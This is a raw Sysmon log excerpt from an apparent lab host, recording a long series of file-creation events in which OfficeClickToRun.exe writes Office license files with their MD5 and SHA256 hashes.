Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail3-pl.xrm-msMD5=E890DAE49CFE6FFEF51CD49F18E212F8,SHA256=C45F02D2C2FEF6240EA70036B8A9715127C71DD06CC588138BD8482BCF7D8A15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-msMD5=E0A68B4AC94BD2F30F893F1976A2AD86,SHA256=3F81CF8370DA56BBCE53D2FB6FE61DFA6262AE59A00BF7F51CADC212821FDE06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-msMD5=0EB09C6290A035491FBE08316E209659,SHA256=6A105AF5C264A8D281773F1A2567DCCF433370658BB1327DD77450100FF019CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail2-ppd.xrm-msMD5=C31BE8BCE70C1FD8DD801552654441D0,SHA256=AE28917C02DFAF1F032016776E979B2BCD77E129636F02F3EEADA002BF7EB66E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail2-pl.xrm-msMD5=1A69850C9E7A50271F6CD109B31EAFDF,SHA256=499DC65B607AAD44F176D029B3F86C5CDC9E365CD7AAA85D642435962FCC1BB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail-ul-phn.xrm-msMD5=E2F1D4DB8DF29EBD0771054658EDDDB3,SHA256=8A7F60594488FBB812502AD03949293E6DC3512B8A1F251C55C6873685D35838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail-ul-oob.xrm-msMD5=E851552BD56684C9FBE792A04A05A5A4,SHA256=D8529D442F249D8F584423DF39AB3144A204B3B19E548CBDFA46EEBBCB8F7E14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail-ppd.xrm-msMD5=C2685581994454A1384BA29FE8608497,SHA256=328353DE7AEB95BFBB1180CF315AE3D8C00E028A0B4EE0D172A6D9AEB346B5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Retail-pl.xrm-msMD5=C44AA94C6FB236BE745DD76033B1533E,SHA256=8D0E90854F4A02C500E4B1D432483BCDE57C86A3AFEF8FDBAA22ADEF1FDFF3F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-phn.xrm-msMD5=7FE217F38E46387209EA65736F09B891,SHA256=43B557947CC2EB95220030D576E59D737923087EE70836C1741B8CAD8D458742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-msMD5=1E8C9F47F18D698316624B8B3CE2F46A,SHA256=9E6ABB09FF7ED30181C2FF008945FCAFBC1F2F98C14E16BEE8062ED7C78124EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp4-ppd.xrm-msMD5=EF2DCD50F394DC2E38DFBC309CEF8106,SHA256=C902CD66A902B066D95A5621D021976D2D4BB390EC25D9E4343FF5939420E07D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-msMD5=FA5BD36DC4242ECDF97017B522964782,SHA256=A34A45ADD73F8F7DCBC9932CB9DCD6624AECC4CADD4B2CCB2BED64675823DDF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-phn.xrm-msMD5=0E368ECC37CDD644CD233E8E3FC57FED,SHA256=8F0F0FB4780998829E840163B6F32B8D2B7F0E2524EB16A7E565B77B9B000511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-oob.xrm-msMD5=C00B8B7A86BC9E72C973629CE33E9364,SHA256=A712DACC55AA7CEE6B71604ABCC05C6D7D4EE7D66653690245C876349B932848,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp3-ppd.xrm-msMD5=1B1036FF826CD3B12302A21B1B64AB36,SHA256=3C43FF113050FEBFCBD3A71A7B848FDE506312B4DAB4C2EFD6C93FF0BC049BD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp3-pl.xrm-msMD5=4011BCED9205BFD3667648FCED653270,SHA256=03D37758BA2D2420203824CBFF3B1816895DE966DBC90BD8514327CC327AC808,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-phn.xrm-msMD5=64E12F8A56C685EC05FE587FBB538E31,SHA256=5782478480F540F104F68B5472114372B7F67B6FF34F51C903871B93A4E5D067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-oob.xrm-msMD5=9E0442DA73F4F17D07352ADC0F17F70E,SHA256=1834E046E9B66D19D63EFE3CBC650C4E3A817E27EEDE006489DA44392CD26623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp2-ppd.xrm-msMD5=A7062AA15F01A79F5F460A3885212BF3,SHA256=DC0DD46556F8A1160842BCBEB0A671B8ED5E86D16DA92399DB19CE809BCE4BB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp2-pl.xrm-msMD5=A30B49D266E2F1568B1ED08786362479,SHA256=44A82863B68967CE8F9F1D7E2B10B12C9D0DFDE4D78E034CFA39241C7F76218E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp-ul-phn.xrm-msMD5=A588847CB61F6C577003A286D3F51DC6,SHA256=D4D2E7D055FE91B5847F60253904C65A00C8308EBBB9C5033AD26C1D987AF35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-msMD5=6B2435C47A0433A0BE712693E5971AEB,SHA256=5FDFF1779DC3A00C14B8C7F16216099C81F40275A4F59FEE0180B1A8F09300DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp-ppd.xrm-msMD5=562D9135232C11D3AA86566C59C932D9,SHA256=8A2451ED907D5D82B8473D6765534343C633A51EE1EA8ACAEC92C58ADB40F2D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_OEM_Perp-pl.xrm-msMD5=723821AD4475EE7FE6825BA6FBB92A22,SHA256=1F1E5B70D48BB2F9DF05F3EAC687EF5A2A680BF89BFB598B342ACE8A433CC2EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Grace-ul-oob.xrm-msMD5=B5E7C2454D5997C1F1214FE7BD00AFB7,SHA256=2AD9749B14974FDCC4DF5DFD08816A6FC708EC2EE287EDF5A001E50FE1E53E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessR_Grace-ppd.xrm-msMD5=31F7EB308BF76C73B445A6B00632095D,SHA256=479685C2500D19D419796D56374AC9C030817F672025E60D949990205917B527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-phn.xrm-msMD5=0DA624557207EDACAF81203C09425C09,SHA256=4B4CD01093AA5FBB16401B4BB1466B3D4492132639D571FAE4613D9424C3C52F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-msMD5=14F1144750CAFD65294EF122BD26BB2F,SHA256=349D7A87AAA3713C144BD21CCCB8A8BC73B8842410D311CC69FB4FCF85A6E60B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ppd.xrm-msMD5=8CFEED90F474A2A7A0EB902D3702CC30,SHA256=EA389836FEFA5112C1231C635EBF0E80B0ECFFCA8CFB86F1D04724416CDB161A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcR_OEM_Perp-pl.xrm-msMD5=832F6CBE47F9B3DB03FF058B968C9B19,SHA256=EAC3EA5EE3C4199A2C61EDD3811FC441E3E61C1ED596F8C79207F344550D83A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcR_Grace-ul-oob.xrm-msMD5=ED90D43067ADBBBF8EB1E088F42B6313,SHA256=8774AEB033B5DAEAF126B1619B4BADB2DA4D17007A506A182D040A99D23C0EA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcR_Grace-ppd.xrm-msMD5=2FC5C1AFF521FBC98C574701FA3D4631,SHA256=C5281A05390243734318820C14BACDB5E3E9B9E55B93F505FFE02F30979B967D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ul-oob.xrm-msMD5=69E356C8379803352E1F0067CF9D78F8,SHA256=01A43C53490E46D52A7FEDCFE63083F513C1E585E900580257400D09A2F15538,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-msMD5=A960FF7F89115B621A316E58DE5EA1A3,SHA256=26A53A597E31D5E873C11A6BD1B6C06E46D91DDDD36F417E095C85D9F705A00B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessDemoR_BypassTrial365-ul-oob.xrm-msMD5=1BAB63AE97EEEDC7D942B0A590ECBB6E,SHA256=F29DE5E72FC4F870F6852EA3F8E8B83B857E0F503EE37673184DA08089595495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusinessDemoR_BypassTrial365-ppd.xrm-msMD5=3D5D703003C6A21B4977EC0832CC0EC8,SHA256=C32A68EFD6DF1463D386FC13B903A3D8BFE7C933E99E56A4D268DF5859591E39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Trial-ul-oob.xrm-msMD5=100EDAA19C4E37A53ADFDF601ED62BFD,SHA256=EE1CDE9B5CC410A7D2FF7759E19B1E64F4E6A31CCF5EDEB1255E0328D43D524D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Trial-ppd.xrm-msMD5=3D0F2F94927A6E2032BBC1564BF2AE43,SHA256=E676B46C37E11572CCA771E2BBD0B97391A6C8B9358A6C517EF49E62BD53EDAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-msMD5=BDF85F71E48C45D7D76F612ADC88E410,SHA256=8166F60A3649D5455D5886AE083BD65BDEA19DC20A75818E9B8536EF53D27EF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Retail-ul-phn.xrm-msMD5=6A9FEA409D3457934EE67BA18E947BE1,SHA256=6D6E843B73C47D922E3DE5EC0A8DAA9EC416D70C2089A6E83FB753344D7CD6C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-msMD5=AAC7441306556B1B00D87B69ED3321BA,SHA256=F61456FA280936600963B1CECAADB76A3E93DE06609B0ABF4DEEBE532CE2F31D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Retail-ppd.xrm-msMD5=01BA59827DC68FED46AA1EC503FF3403,SHA256=CB5DE6D703A4B53A5CC427C054400FA0C548C02C1BA0B2909FE80F970BF48075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-msMD5=B53986B6C07E2F0599F562947C5D4193,SHA256=CA868EE393540E6F59832DB1EE7D0BCA1646CAE830FAFF6EED5276ABDA67636D,IMPHASH=00000000000000000000000000000000falsetrue 